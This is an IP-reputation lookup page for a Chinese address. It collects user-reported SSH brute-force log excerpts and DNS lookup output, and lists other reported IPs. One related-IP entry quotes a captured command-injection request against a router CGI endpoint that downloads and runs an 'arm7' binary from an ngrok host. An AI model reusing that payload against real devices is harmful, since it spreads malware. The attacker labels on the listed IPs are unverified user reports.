58.213.68.94 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: China

Internet Service Provider: ChinaNet Jiangsu Province Network

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

Type	Details	Datetime
attack	Jun 7 10:46:18 pornomens sshd\[19107\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 user=root Jun 7 10:46:20 pornomens sshd\[19107\]: Failed password for root from 58.213.68.94 port 48048 ssh2 Jun 7 10:49:57 pornomens sshd\[19147\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 user=root ...	2020-06-07 17:26:54
attack	Jun 5 06:34:46 vpn01 sshd[13233]: Failed password for root from 58.213.68.94 port 38810 ssh2 ...	2020-06-05 13:39:14
attackspambots	Jun 2 14:10:56 Ubuntu-1404-trusty-64-minimal sshd\[6829\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 user=root Jun 2 14:10:59 Ubuntu-1404-trusty-64-minimal sshd\[6829\]: Failed password for root from 58.213.68.94 port 51670 ssh2 Jun 2 15:03:32 Ubuntu-1404-trusty-64-minimal sshd\[24386\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 user=root Jun 2 15:03:34 Ubuntu-1404-trusty-64-minimal sshd\[24386\]: Failed password for root from 58.213.68.94 port 45490 ssh2 Jun 2 15:07:42 Ubuntu-1404-trusty-64-minimal sshd\[24081\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 user=root	2020-06-03 01:23:12
attackbotsspam	Invalid user pty from 58.213.68.94 port 55292	2020-05-30 14:21:16
attack	May 23 14:31:08 legacy sshd[27706]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 May 23 14:31:10 legacy sshd[27706]: Failed password for invalid user ixl from 58.213.68.94 port 48558 ssh2 May 23 14:35:16 legacy sshd[27843]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 ...	2020-05-23 20:53:03
attackbotsspam	Invalid user rnu from 58.213.68.94 port 38276	2020-05-22 15:55:02
attack	May 9 00:21:57 pve1 sshd[30303]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 May 9 00:21:59 pve1 sshd[30303]: Failed password for invalid user oracle from 58.213.68.94 port 46684 ssh2 ...	2020-05-09 07:59:46
attackspam	2020-05-07T13:51:05.457785rocketchat.forhosting.nl sshd[23086]: Invalid user dusty from 58.213.68.94 port 51002 2020-05-07T13:51:07.931025rocketchat.forhosting.nl sshd[23086]: Failed password for invalid user dusty from 58.213.68.94 port 51002 ssh2 2020-05-07T14:01:52.443458rocketchat.forhosting.nl sshd[23403]: Invalid user mahmood from 58.213.68.94 port 38962 ...	2020-05-07 21:09:00
attackbotsspam	May 6 22:43:59 sip sshd[141906]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 May 6 22:43:59 sip sshd[141906]: Invalid user site02 from 58.213.68.94 port 43082 May 6 22:44:01 sip sshd[141906]: Failed password for invalid user site02 from 58.213.68.94 port 43082 ssh2 ...	2020-05-07 05:14:11
attack	Invalid user reception from 58.213.68.94 port 56290	2020-04-29 13:58:31
attack	Apr 27 18:58:43 webhost01 sshd[19246]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 Apr 27 18:58:45 webhost01 sshd[19246]: Failed password for invalid user michael from 58.213.68.94 port 51720 ssh2 ...	2020-04-27 20:10:54
attack	Apr 26 13:35:33 sip sshd[7781]: Failed password for root from 58.213.68.94 port 42764 ssh2 Apr 26 13:52:23 sip sshd[14075]: Failed password for root from 58.213.68.94 port 39034 ssh2	2020-04-26 23:09:07
attack	odoo8 ...	2020-04-25 01:15:03
attackbotsspam	(sshd) Failed SSH login from 58.213.68.94 (CN/China/-): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Apr 16 14:50:30 s1 sshd[400]: Invalid user william from 58.213.68.94 port 43650 Apr 16 14:50:32 s1 sshd[400]: Failed password for invalid user william from 58.213.68.94 port 43650 ssh2 Apr 16 15:11:27 s1 sshd[2282]: Invalid user test from 58.213.68.94 port 32940 Apr 16 15:11:29 s1 sshd[2282]: Failed password for invalid user test from 58.213.68.94 port 32940 ssh2 Apr 16 15:15:26 s1 sshd[2641]: Invalid user qr from 58.213.68.94 port 54720	2020-04-16 20:59:34
attack	Apr 7 14:48:58 odroid64 sshd\[6485\]: Invalid user ubuntu from 58.213.68.94 Apr 7 14:48:58 odroid64 sshd\[6485\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 ...	2020-04-08 00:32:10
attackbotsspam	Apr 4 21:00:07 v22019038103785759 sshd\[23531\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 user=root Apr 4 21:00:09 v22019038103785759 sshd\[23531\]: Failed password for root from 58.213.68.94 port 37784 ssh2 Apr 4 21:04:40 v22019038103785759 sshd\[23819\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 user=root Apr 4 21:04:42 v22019038103785759 sshd\[23819\]: Failed password for root from 58.213.68.94 port 45362 ssh2 Apr 4 21:08:45 v22019038103785759 sshd\[24051\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 user=root ...	2020-04-05 03:55:02
attackspam	2020-03-30T22:45:23.482915linuxbox-skyline sshd[102000]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94 user=root 2020-03-30T22:45:25.514727linuxbox-skyline sshd[102000]: Failed password for root from 58.213.68.94 port 41976 ssh2 ...	2020-03-31 13:15:09
attack	Mar 27 10:00:27 vmd48417 sshd[20365]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.213.68.94	2020-03-27 17:25:16
attackbotsspam	Invalid user ex from 58.213.68.94 port 45292	2020-03-25 15:52:25
attackspam	Total attacks: 2	2020-02-29 19:53:28

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 58.213.68.94
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 39938
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;58.213.68.94.			IN	A

;; AUTHORITY SECTION:
.			587	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020022900 1800 900 604800 86400

;; Query time: 151 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Feb 29 19:53:24 CST 2020
;; MSG SIZE  rcvd: 116

Host info

Host 94.68.213.58.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 94.68.213.58.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
180.247.171.84	attack	1589881719 - 05/19/2020 11:48:39 Host: 180.247.171.84/180.247.171.84 Port: 445 TCP Blocked	2020-05-20 01:25:09
192.95.10.101	attackbotsspam	RDP Bruteforce	2020-05-20 01:11:39
52.191.14.95	attackbotsspam	May 18 15:19:44 master sshd[28057]: Failed password for invalid user qxl from 52.191.14.95 port 44400 ssh2 May 18 15:29:02 master sshd[28098]: Failed password for invalid user fty from 52.191.14.95 port 33634 ssh2 May 18 15:32:38 master sshd[28512]: Failed password for invalid user tzu from 52.191.14.95 port 42014 ssh2 May 18 15:36:38 master sshd[28514]: Failed password for invalid user fbi from 52.191.14.95 port 50486 ssh2 May 18 15:40:50 master sshd[28592]: Failed password for invalid user xpj from 52.191.14.95 port 59002 ssh2 May 18 15:44:50 master sshd[28594]: Failed password for invalid user sja from 52.191.14.95 port 39244 ssh2 May 18 15:48:41 master sshd[28636]: Failed password for invalid user uue from 52.191.14.95 port 47678 ssh2 May 18 15:52:48 master sshd[28673]: Failed password for invalid user ps from 52.191.14.95 port 56174 ssh2 May 18 15:56:56 master sshd[28677]: Failed password for invalid user dzr from 52.191.14.95 port 36450 ssh2	2020-05-20 00:54:16
184.154.189.90	attackbots	Fail2Ban Ban Triggered	2020-05-20 01:05:53
83.102.58.122	attackbotsspam	$f2bV_matches	2020-05-20 00:53:01
106.13.112.221	attackbots	May 19 11:52:46 cp sshd[28349]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.112.221 May 19 11:52:46 cp sshd[28349]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.112.221	2020-05-20 00:40:44
45.254.25.213	attackspambots	May 19 18:32:05 vps687878 sshd\[16362\]: Invalid user xpx from 45.254.25.213 port 44568 May 19 18:32:05 vps687878 sshd\[16362\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.254.25.213 May 19 18:32:07 vps687878 sshd\[16362\]: Failed password for invalid user xpx from 45.254.25.213 port 44568 ssh2 May 19 18:39:56 vps687878 sshd\[17175\]: Invalid user xff from 45.254.25.213 port 40164 May 19 18:39:56 vps687878 sshd\[17175\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.254.25.213 ...	2020-05-20 01:01:07
103.246.240.30	attackspambots	May 19 18:52:29 lnxded64 sshd[2273]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.246.240.30 May 19 18:52:31 lnxded64 sshd[2273]: Failed password for invalid user suw from 103.246.240.30 port 51988 ssh2 May 19 19:01:23 lnxded64 sshd[5028]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.246.240.30	2020-05-20 01:26:47
151.99.146.218	attack	[19/May/2020:02:20:21 +0200] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1"	2020-05-20 00:40:15
5.68.100.90	attackspambots	Chat Spam	2020-05-20 01:09:54
94.102.52.57	attackbots	Portscan or hack attempt detected by psad/fwsnort	2020-05-20 01:27:43
94.177.214.200	attackbotsspam	May 19 18:31:52 nextcloud sshd\[27085\]: Invalid user rft from 94.177.214.200 May 19 18:31:52 nextcloud sshd\[27085\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=94.177.214.200 May 19 18:31:53 nextcloud sshd\[27085\]: Failed password for invalid user rft from 94.177.214.200 port 46116 ssh2	2020-05-20 01:12:21
174.44.16.69	attack	May 19 18:40:12 mout sshd[29315]: Invalid user guest from 174.44.16.69 port 59420 May 19 18:40:14 mout sshd[29315]: Failed password for invalid user guest from 174.44.16.69 port 59420 ssh2 May 19 18:40:14 mout sshd[29315]: Connection closed by 174.44.16.69 port 59420 [preauth]	2020-05-20 01:11:51
95.154.200.170	attackbotsspam	Contact form spam	2020-05-20 01:34:29
129.211.55.22	attackspam	May 19 11:49:59 ns37 sshd[22449]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.211.55.22 May 19 11:49:59 ns37 sshd[22449]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.211.55.22	2020-05-20 01:10:17

Recently Reported IPs

111.255.23.112	197.174.51.34	95.213.193.231	13.82.53.248
111.251.139.86	58.134.58.207	58.187.21.196	134.247.12.59
58.39.182.68	111.242.132.209	182.50.130.135	189.173.29.148
111.241.116.12	111.235.74.244	106.54.34.136	220.233.176.42
111.229.20.220	101.51.203.103	45.64.1.57	36.23.241.228